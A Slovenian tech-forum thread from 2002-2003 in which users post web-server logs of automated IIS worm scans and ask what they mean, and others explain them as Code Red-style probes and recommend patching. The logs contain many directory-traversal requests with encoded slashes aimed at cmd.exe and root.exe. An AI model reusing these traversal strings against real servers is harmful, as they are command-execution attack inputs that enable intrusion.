Zanimiv server LOG @ Slo-Tech

Forum » Omrežja in internet »
Zanimiv server LOG

Zanimiv server LOG

Tr0n :: 28. okt 2002, 14:12

To sem danes najdo v Apache error.log fajlu. Apache uporabljam lokalno za PHP stuff.

[Sun Oct 27 12:47:43 2002] [error] [client 213.250.160.45] File does not exist: d:/server/scripts/root.exe
[Sun Oct 27 12:47:43 2002] [error] [client 213.250.160.45] File does not exist: d:/server/msadc/root.exe
[Sun Oct 27 12:47:43 2002] [error] [client 213.250.160.45] File does not exist: d:/server/c/winnt/system32/cmd.exe
[Sun Oct 27 12:47:44 2002] [error] [client 213.250.160.45] File does not exist: d:/server/d/winnt/system32/cmd.exe
[Sun Oct 27 12:47:44 2002] [error] [client 213.250.160.45] File does not exist: d:/server/scripts/..%5c/winnt/system32/cmd.exe
[Sun Oct 27 12:47:44 2002] [error] [client 213.250.160.45] File does not exist: d:/server/_vti_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
[Sun Oct 27 12:47:45 2002] [error] [client 213.250.160.45] File does not exist: d:/server/_mem_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
[Sun Oct 27 12:47:45 2002] [error] [client 213.250.160.45] File does not exist: d:/server/msadc/..%5c/..%5c/..%5c/..Á/..Á/..Á/winnt/system32/cmd.exe
[Sun Oct 27 12:47:46 2002] [error] [client 213.250.160.45] File does not exist: d:/server/scripts/..Á/winnt/system32/cmd.exe
[Sun Oct 27 12:47:46 2002] [error] [client 213.250.160.45] File does not exist: d:/server/scripts/..ŔŻ/winnt/system32/cmd.exe
[Sun Oct 27 12:47:47 2002] [error] [client 213.250.160.45] File does not exist: d:/server/scripts/..Áś/winnt/system32/cmd.exe
[Sun Oct 27 12:47:48 2002] [error] [client 213.250.160.45] File does not exist: d:/server/scripts/..%5c/winnt/system32/cmd.exe
[Sun Oct 27 12:47:49 2002] [error] [client 213.250.160.45] File does not exist: d:/server/scripts/..%2f/winnt/system32/cmd.exe

IP zgleda kot SiOL. Kaj porecete na to? :)

Gandalfar :: 28. okt 2002, 14:13

ja nic taksnega. Pac code red in ostali crvi, ki iscejo IIS exploite naokoli po netu..

Tr0n :: 28. okt 2002, 14:16

Uff, bo treba malce bolje poskrbet za varnost :).

StratOS :: 29. okt 2002, 07:27

Yup, en remote exploit :)
Se dobro, da ni nasu cmd-ja ali kaj ostalega :)

kar se tice napadalca, naj bi bil iz Spanije, ce ni mel kak proxy itd ...

inetnum: 213.250.160.0 - 213.250.163.255
netname: ALO2000-NET-1
descr: ALO Comunicaciones, S.A.
descr: Broadband Internet Service Provider
country: ES
admin-c: ANOC4-RIPE
tech-c: ANOC4-RIPE
status: ASSIGNED PA
mnt-by: AS13222-MNT
changed: mandrade@alo.es 20011107
source: RIPE

"Multitasking - ability to f##k up several things at once."
"It works better if you plug it in."
"The one who is digging the hole for the other to fall in is allready in it."

Zgodovina sprememb…

spremenila: StratOS (29. okt 2002 ob 07:33)

Gandalfar :: 29. okt 2002, 09:02

ne se trudit. Verjetn en racunalnik z code red, ki se trudi najti naslednjega. Vsak admin, ki administrira web server ti bo potrdil, da ima polne loge teh exploitov iz vseh moznih virov.

Ne vem ce je vredno, da se s tem ukvarjas. Lahko pa posljes adminu mail, da je ta pa ta IP na njihovem omrezju okuzen z code red, ce se ti ravno da..

CaqKa :: 30. okt 2002, 12:24

http://flumps.org/ip/c/213/213_250.html

španija? stratos to si pa malo sfulil :)

http://flumps.org/ip/
tuki si jih lahko iščete če že

em gandalfar in ostali .. a lahko poveste kaj pa naredi tale zadeva.. če imam sp1 na xp instaliran se mam česa bat?

sasox :: 30. okt 2002, 15:43

Caqka ti si falu :) IP je iz Spanije in sicer od ALO Comunicaciones S.A. in sicer tako kot je rekel StratOS

CaqKa :: 30. okt 2002, 16:45

te pa bojo ovi tam morali strani updejtat :)

Seadoo :: 1. nov 2002, 16:54

Kako se pa zavarujes proti takim stvarem? Ce mas recimo doma na ADSL-u www, ftp, mail, dns serverje in ful noces, da ti kdo kaj takega 'grdega' stori?

Sej vem da so za to firewalli, sam...

Out of my mind. Back in five minutes.

Gandalfar :: 1. nov 2002, 16:59

redno patchanje in pravilna konifiguracija vseh servisov

StratOS :: 4. nov 2002, 14:41

ja and hope for the best.

Gledal loge itd..
prijavit na kaksen security mailing list, patch AV in FW softwarja ...

"Multitasking - ability to f##k up several things at once."
"It works better if you plug it in."
"The one who is digging the hole for the other to fall in is allready in it."

bosstjann :: 3. jan 2003, 14:30

192.168.0.183 - - [01/Jan/2003:23:04:18 +0100] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
192.168.0.183 - - [01/Jan/2003:23:04:18 +0100] "PROPFIND /D HTTP/1.1" 404 284 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
200.72.33.90 - - [02/Jan/2003:01:31:23 +0100] "GET / HTTP/1.1" 400 384 "-" "-"
193.77.9.11 - - [02/Jan/2003:01:57:24 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
193.77.9.11 - - [02/Jan/2003:04:46:03 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
193.77.9.11 - - [02/Jan/2003:04:46:03 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
193.77.9.11 - - [02/Jan/2003:04:46:13 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
193.77.9.11 - - [02/Jan/2003:04:46:23 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
193.77.9.11 - - [02/Jan/2003:04:46:24 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
193.77.9.11 - - [02/Jan/2003:04:46:27 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
193.77.9.11 - - [02/Jan/2003:04:46:28 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
193.77.9.11 - - [02/Jan/2003:04:46:28 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
193.77.9.11 - - [02/Jan/2003:04:46:29 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
193.77.9.11 - - [02/Jan/2003:04:46:30 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
193.77.9.11 - - [02/Jan/2003:04:46:31 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
193.77.9.11 - - [02/Jan/2003:06:23:20 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
193.77.9.11 - - [02/Jan/2003:06:23:21 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
193.77.62.89 - - [02/Jan/2003:12:15:35 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
193.77.62.89 - - [02/Jan/2003:12:15:41 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
193.77.62.89 - - [02/Jan/2003:12:15:47 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
193.77.62.89 - - [02/Jan/2003:12:15:52 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
193.77.62.89 - - [02/Jan/2003:12:15:57 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
193.77.62.89 - - [02/Jan/2003:12:16:03 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:42 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:43 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:43 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:44 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:45 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:46 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:47 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:48 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:49 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:50 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:51 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:51 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:52 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:53 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:54 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
193.255.244.98 - - [03/Jan/2003:00:37:55 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
216.184.99.66 - - [03/Jan/2003:05:16:25 +0100] "GET / HTTP/1.1" 400 384 "-" "-"
193.77.62.89 - - [03/Jan/2003:13:10:33 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
193.77.62.89 - - [03/Jan/2003:13:16:18 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"

mene zanima a je to normalen k men se zdi tole zlo pogosto glrde da srver lavfa šele 3 dni

TheHijacker :: 3. jan 2003, 14:39

To je vse code red... Pač ignoriraš... Takole pa izgleda ko te neka oseba hoče shekat:

[Mon Dec 16 13:46:26 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/subSilver/images/.gif HTTP/1.1\r\x03\x01
[Mon Dec 16 13:46:26 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_row1.gif HTTP/\x03\x01
[Mon Dec 16 13:46:28 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/cellpic3.gif HTj\x95\x82\x8d\xda\xbc\xcb\x8d\x1a\x07vn\v\x80\x7fV \x99\x16;\xfeg\x05\x12\x9c\x882\xc03\x80\t&d\x13\xdc\x03\xd8\xcd\x91\x03x\x03\x86P\x01\x10\x80\x83\x1c.\x18 \xc6\xc5\x03\" HTTP/1.0
[Mon Dec 16 13:46:29 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/cellpic3.gif HTj\x95\x82\x8d\xda\xbc\xcb\x8d\x1a\x07vn\v\x80\x7fV \x99\x16;\xfeg\x05\x12\x9c\x882\xc03\x80\t&d\x13\xdc\x03\xd8\xcd\x91\x03x\x03\x86P\x01\x10\x80\x83\x1c.\x18 \xc6\xc5\x03\" HTTP/1.0
[Mon Dec 16 13:46:30 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/cellpic1.jpg HT\x03\x01
[Mon Dec 16 13:46:30 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/cellpic1.jpg HT8\x03\x01
[Mon Dec 16 13:46:31 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/cellpic3.gif HT8\x03\x01
[Mon Dec 16 14:01:39 2002] [error] [client 62.252.224.7] File does not exist: /home/virtual/site1/fst/var/www/html/templates/Firmware/images/_forums_home.giwÝ˙fÓ-°-ďTfüŃjTk¤˛ôx¤vsĄ";ô7{ř8TŚŹ§ěŘ-'"ŇĐčŢ>ć -Ś&¨ -ŚV-˘-Á)]>]kü(Ymş§ňŚĂ=ÂáLŃ&=zÜB
[Mon Dec 16 14:01:39 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/subSilver/images/spacer.gif HTT\xf6\xb2\xbdZ\xdc\x06\xf9)\xe62\xd2InE\xd2\xdb\xe4\xab\xc2>\x95\xd1M\xce\x8e\x17\\\xafpc\x0f*_\xb6,S\x7fOO\xed\xf7\xd3\x0f:p!
[Mon Dec 16 14:01:40 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_nav_right.gif \x126\xb9x\xd9%H\xf3M$P\x10\xff\xff\xe3\xcb
[Mon Dec 16 14:01:40 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_c_v.gif HTTP/1\b\xd8|\xbd3\xab5j\xb3\x95\xe5\xc3\xae}\xb1\x10\xc3\xb9Kq\x8a\x90\x18\x9cF\xaa\xe0\xd0\xda\xe8\xb3\xbb\xe5\x8d\x1c;Q\xe5\xe1E\xb9\x94\x8cq;\x0e\x06i\x83\xc7\x19,O\x81\xc2\x17X\xb4\x0c\xafO\xb7\xc8\x05\xee\xa8\xf8\xae{\xefabg\xd9\xa2\x94F\x16\xce\xd0J?\xc5\xef.\x1fPy\xf5.\x9d\xb7W3\xda\x86\xfa\xbc~<\xae\x02\x17\xfcb\xd7\x9f\xc3\xfbh\x92\x9e\xca\xd6S\xa0\xf4\xb5\xf8\xc1\x17\xd6t@\x15\xc2\xad\xf7\x8e/\x96af\x04\xd19\x93\xe1\xbcrF0\xcbo\xe6\xf5\xdd\x99B\xfe\x98h=8e\xce\xc9|\xff\xb1\xe1}Nq\"\x14\x13h\x9e\x9fX}&\xe2T\xaa\xcd\xb7\x14L\xb0rf\x85\xffe\xbe\x95-t\xb7\x95\xb4\xdba\xb8\xddV\xf9\xe3\xcd\xba\xfac5T\xc0\x95G\xe7\x97\xa8O\xbc\xd0\x13W\x1d\x7f\x16z\xfb\xfe\x93\x06\".\xb9\xaf6\xb2\x1e\xfc\x9eP\xbd<\xb9\xf5q9\x7f\xec\xe5\xc5\xeb\xb0\x01\x9b\xd9\x90\x80\xa8\xb9\xaa&}\xcd \xa6\xa5\x84XkVh\xba|\xc35\xbch:\v\xbc\x87/\xd2\xf5\xbbZN\xea\x0f\xe7\xe3\xde\x1e\xe7
[Mon Dec 16 14:01:41 2002] [error] [client 62.252.224.7] File does not exist: /home/virtual/site1/fst/var/www/html/templates/Firmware/images/_header_bg.gif
[Mon Dec 16 14:01:41 2002] [error] [client 62.252.224.7] File does not exist: /home/virtual/site1/fst/var/www/html/templates/Firmware/images/_abovenav_bg.giarRž{N}<(í2s3ÖiBĎďź'Tűß+ě+
[Mon Dec 16 14:01:41 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/cellpic3.gif HT+\x01Q`U\xfc\xda\xeb\xc3~\x07#\x126\x84\xb0\xb7\x9c\xf6\xfb\xefF\x80\x10\xff\xff\x1fd
[Mon Dec 16 14:01:42 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/subSilver/images/.gif HTTP/1.1\rk^\xc5\xd3P\x18\xff\xff\x1da
[Mon Dec 16 14:01:42 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_row2.gif HTTP/N\x15\x9ecw\xb7\x1a~\xa0/\x92-\xe4\xd8u\xebVsQJ\xbc*\xfa\xc0kL\xb0S\xf9,\x94\x8f\x10y`\xc1
[Mon Dec 16 14:01:42 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_row1.gif HTTP/\x1b\xe0\x82\x86y\xfc\xa3N<\xde~\x80\xa1b\xa69\xa5\x1b\xa0i\xfc\bT\xa9\xf9\xe9M\xbcb\x1cj\xd4\x12x\x1f]\x1b\x90y\x81ERh\xdcBo\xf2\b&ss\xea\xd1\x14h\x83Hb\xcdj&2\xfb=a1\xc3 HTTP/1.0
[Mon Dec 16 14:01:42 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/cellpic1.jpg HT\xe8\x88N\x1a\b
[Mon Dec 16 14:01:42 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_c_bg.gif HTTP/\xa4v\x95\x8c\xee\x03\x9d\xe3\x9f\xe7\xc3\xd5]\xa1z\xfdnM\x1d\xea\xee\xafajI\xd9,\x94\xca\x95\x83\x01\tY\xc2\xad#X=+\xda\xe1O\xd0<\xc9`w\xd5\x8aUv\xad\x1e{\x04\xed\x04\x19\x8de\b8\x13\xff\xc5\xa63g\xf2\xbb\xe6\xc9\xd4t\xcb\xe1[\b\x90\x17\x038\x82\xf0\xb0\xca\x12y\xceU\x94\xdc\xea

[Sun Dec 29 14:34:04 2002] [error] [client 80.3.64.5] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_header.gif HTT/* HTTP/1.0
[Sun Dec 29 14:34:04 2002] [error] [client 80.3.64.5] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_phpbb.gif HTTP/* HTTP/1.0
[Sun Dec 29 15:48:49 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_nacept: */* HTTP/1.0
[Sun Dec 29 15:50:19 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/Firmware.c: */* HTTP/1.0
[Sun Dec 29 16:10:39 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /images/dvdrgnfree.gif HTTP/1.\v)\xd4,\xb5\xb1c2'i\xd1`\xba\xfcD)\xaat\x88\xa7o\xd7UO
[Sun Dec 29 16:10:39 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_he\v)\xd4,\xb5\xb1c2'i\xd1`\xba\xfcD)\xaat\x88\xa7o\xd7UO
[Sun Dec 29 16:10:43 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_c_\xb2\xa3\xff/\x94\xf1\xf0~\x9f\xdfU\x8b\x89\x03\xea\xf7(4(\xc3\xfb\x1b\xcdk\x80\xa1\xaemU\x84\xbf\x06\x96\xbb\xd2\x0f\xa6\xc5\xdcb\xb3\x92\xfb\xe8\x80\xa1F\xe9d\xb4\xf1\"\t\x124&
[Sun Dec 29 16:44:49 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/spa\xa4\xc5?z2#&\xb0^\xd6\xf0\x1c\x9b8\xc9\xf1\xd8\xc4\x0e\xfe\x02\x1b\xd7\x14\xa8\xfbZ\xb8d;\x8db7\x91\xceG~\x1dOJ\x8c\x92\x8b\xfe=\xa9@\xac\x989!\xfae%\xda\xb7\xd9\x07\"\xa4`\xde\xb0]\xb2[5, HTTP/1.0
[Sun Dec 29 16:46:25 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/folF\xdb\xfa\xe5\x97%\x9c\x12RC\x83\xdb\x90V\xea\xe7\xa2\x1c\xc99\x84\x10p\x13\x07\xa5\x85kT\x1e\xd3\xf4\xdf\x8c\x1c\xbbL=\xb6\xac\x8f*\x04\xc1\x0c\xeb\x17J\x0e\xe1\xcb\x05\x19\"O\x82\xe0\b\xe2I\x93\xe04\xbbQ\xf9+\x1dI\x80\x91\xb4\x1e\xc3I\xf6\x9c\x1c\xc5Y\xd4f\x14'\x0c8\x12\x95'\x85\x12\xd0|A\x07
[Sun Dec 29 16:46:25 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/folF\xdb\xfa\xe5\x97%\x9c\x12RC\x83\xdb\x90V\xea\xe7\xa2\x1c\xc99\x84\x10p\x13\x07\xa5\x85kT\x1e\xd3\xf4\xdf\x8c\x1c\xbbL=\xb6\xac\x8f*\x04\xc1\x0c\xeb\x17J\x0e\xe1\xcb\x05\x19\"O\x82\xe0\b\xe2I\x93\xe04\xbbQ\xf9+\x1dI\x80\x91\xb4\x1e\xc3I\xf6\x9c\x1c\xc5Y\xd4f\x14'\x0c8\x12\x95'\x85\x12\xd0|A\x07
[Sun Dec 29 16:46:31 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /viewtopic.php?t=9224 HTTP/1.1\x9a\xc2\xa8.\xcc/\x96\x1dn\xfe\xa2\xf6\xa90\x18a\xd9\xc0=b\x1b\x1f)\xa6\xce:G\xf8\xf8X+\x7f\x8c{\t\x16_BXp\x99t\xec\xc0E\x8b\xc7\x80}\x83Q\x99lXw\x0c(G\xf8\t#\xfc\x1f\xb3\x81-\xe8\x0e`B\x18\x81 HTTP/1.0
[Sun Dec 29 16:46:36 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /viewtopic.php?t=9224 HTTP/1.1\x91 v\xa0\x1d%U,\xc8eb\xa8\xcep\\R\x06\x81G\xb6tC\xff\xfe$R\x8e2~N0\xcb{\xe1'\x8d\x86\xc0F\xd1h:,s`.\x82MaY'XixK\v\xf8\xacP\x93\x7fQ\x0e`I\xc4a\r\xc0\x96%\x0ejh\xa8\x85\xf4\xc2\x90G\x1eu\x8b\x04\xb0&\x0e\xe0\x8eo\x04\x13i\x97\x05\xdar\x05\xd2-=\x98\xe4\x90$\xf8
[Sun Dec 29 17:03:08 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /images/smiles/icon_lol.gif HT\xdb\xaf\x0c~\x95'
[Sun Dec 29 17:05:35 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_c.\xea@\xca\xbc\xe27\xc2@\xb6\t\xaf\b\x12l\x83\x92\x8e\"\x9a\x86X\x02\x10\xd7\x90\xa2\x05\x07+\xae\xc1\x04\x9d\x1a\x92ia\xe8\x8b9\xd1\xe9\xafi\xddI\x98\xb7s HTTP/1.0
[Sun Dec 29 17:05:35 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_c_\xea@\xca\xbc\xe27\xc2@\xb6\t\xaf\b\x12l\x83\x92\x8e\"\x9a\x86X\x02\x10\xd7\x90\xa2\x05\x07+\xae\xc1\x04\x9d\x1a\x92ia\xe8\x8b9\xd1\xe9\xafi\xddI\x98\xb7s HTTP/1.0
[Sun Dec 29 17:10:04 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /images/smiles/icon_smile.gif \xd3\x04
[Sun Dec 29 17:11:44 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_he\xcaR\x8b\x8a\x81\x82\xb6J\x86z\x06J\xf6v6\x89\x05\x059\x99\xc9\x89%@\xb1b\x85\x8a\xe2L\xab\xbc|\xbf\xc4\xdc\xd4\xe2\x82\xc4\xe4\xd4\xe0\xe4\x8c\xd4\xdcD\x9f|\x88\xb4\xadRFII\x81\x95\xbe~yy\xb9^qFbQjbU\xa2^r~\xae~1X]\xb1>\x92Yz\x15\xc5)J(\xa6\xeb\xdb\xd9 +(\xb6s\xe0\xf3\x0c\r\xf2ap\xf1c\xf0ua\bp\vf`\x90[\x9f\x90<\xa7\xfa\xaf\xdc\xff\xefS\xd6\xc9;\x9cd
[Sun Dec 29 17:11:44 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_ab\xcaR\x8b\x8a\x81\x82\xb6J\x86z\x06J\xf6v6\x89\x05\x059\x99\xc9\x89%@\xb1b\x85\x8a\xe2L\xab\xbc|\xbf\xc4\xdc\xd4\xe2\x82\xc4\xe4\xd4\xe0\xe4\x8c\xd4\xdcD\x9f|\x88\xb4\xadRFII\x81\x95\xbe~yy\xb9^qFbQjbU\xa2^r~\xae~1X]\xb1>\x92Yz\x15\xc5)J(\xa6\xeb\xdb\xd9 +(\xb6s\xe0\xf3\x0c\r\xf2ap\xf1c\xf0ua\bp\vf`\x90[\x9f\x90<\xa7\xfa\xaf\xdc\xff\xefS\xd6\xc9;\x9cd
[Sun Dec 29 17:11:44 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_ph\xcaR\x8b\x8a\x81\x82\xb6J\x86z\x06J\xf6v6\x89\x05\x059\x99\xc9\x89%@\xb1b\x85\x8a\xe2L\xab\xbc|\xbf\xc4\xdc\xd4\xe2\x82\xc4\xe4\xd4\xe0\xe4\x8c\xd4\xdcD\x9f|\x88\xb4\xadRFII\x81\x95\xbe~yy\xb9^qFbQjbU\xa2^r~\xae~1X]\xb1>\x92Yz\x15\xc5)J(\xa6\xeb\xdb\xd9 +(\xb6s\xe0\xf3\x0c\r\xf2ap\xf1c\xf0ua\bp\vf`\x90[\x9f\x90<\xa7\xfa\xaf\xdc\xff\xefS\xd6\xc9;\x9cd
[Sun Dec 29 17:11:44 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/_na\xcaR\x8b\x8a\x81\x82\xb6J\x86z\x06J\xf6v6\x89\x05\x059\x99\xc9\x89%@\xb1b\x85\x8a\xe2L\xab\xbc|\xbf\xc4\xdc\xd4\xe2\x82\xc4\xe4\xd4\xe0\xe4\x8c\xd4\xdcD\x9f|\x88\xb4\xadRFII\x81\x95\xbe~yy\xb9^qFbQjbU\xa2^r~\xae~1X]\xb1>\x92Yz\x15\xc5)J(\xa6\xeb\xdb\xd9 +(\xb6s\xe0\xf3\x0c\r\xf2ap\xf1c\xf0ua\bp\vf`\x90[\x9f\x90<\xa7\xfa\xaf\xdc\xff\xefS\xd6\xc9;\x9cd
[Sun Dec 29 17:11:53 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/fol\xcaR\x8b\x8a\x81\x82\xb6J\x86z\x06J\xf6v6\x89\x05\x059\x99\xc9\x89%@\xb1b\x85\x8a\xe2L\xab\xbc|\xbf\xc4\xdc\xd4\xe2\x82\xc4\xe4\xd4\xe0\xe4\x8c\xd4\xdcD\x9f|\x88\xb4\xadRFII\x81\x95\xbe~yy\xb9^qFbQjbU\xa2^r~\xae~1X]\xb1>\x92Yz\x15\xc5)J(\xa6\xeb\xdb\xd9 +(\xb6s\xe0\xf3\x0c\r\xf2ap\xf1c\xf0ua\bp\vf`\x90[\x9f\x90<\xa7\xfa\xaf\xdc\xff\xefS\xd6\xc9;\x9cd
[Sun Dec 29 17:11:53 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/fol\xcaR\x8b\x8a\x81\x82\xb6J\x86z\x06J\xf6v6\x89\x05\x059\x99\xc9\x89%@\xb1b\x85\x8a\xe2L\xab\xbc|\xbf\xc4\xdc\xd4\xe2\x82\xc4\xe4\xd4\xe0\xe4\x8c\xd4\xdcD\x9f|\x88\xb4\xadRFII\x81\x95\xbe~yy\xb9^qFbQjbU\xa2^r~\xae~1X]\xb1>\x92Yz\x15\xc5)J(\xa6\xeb\xdb\xd9 +(\xb6s\xe0\xf3\x0c\r\xf2ap\xf1c\xf0ua\bp\vf`\x90[\x9f\x90<\xa7\xfa\xaf\xdc\xff\xefS\xd6\xc9;\x9cd
[Sun Dec 29 17:11:53 2002] [error] [client 62.255.64.6] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/fol\xcaR\x8b\x8a\x81\x82\xb6J\x86z\x06J\xf6v6\x89\x05\x059\x99\xc9\x89%@\xb1b\x85\x8a\xe2L\xab\xbc|\xbf\xc4\xdc\xd4\xe2\x82\xc4\xe4\xd4\xe0\xe4\x8c\xd4\xdcD\x9f|\x88\xb4\xadRFII\x81\x95\xbe~yy\xb9^qFbQjbU\xa2^r~\xae~1X]\xb1>\x92Yz\x15\xc5)J(\xa6\xeb\xdb\xd9 +(\xb6s\xe0\xf3\x0c\r\xf2ap\xf1c\xf0ua\bp\vf`\x90[\x9f\x90<\xa7\xfa\xaf\xdc\xff\xefS\xd6\xc9;\x9cd
[Sun Dec 29 18:44:42 2002] [error] [client 62.252.224.7] request failed: erroneous characters after protocol string: GET /templates/Firmware/images/icon_email.gif TP/1.1 HTTP/1.0

K sreči neuspešno in tudi prijavili smo ga policiji...

http://www.google.si

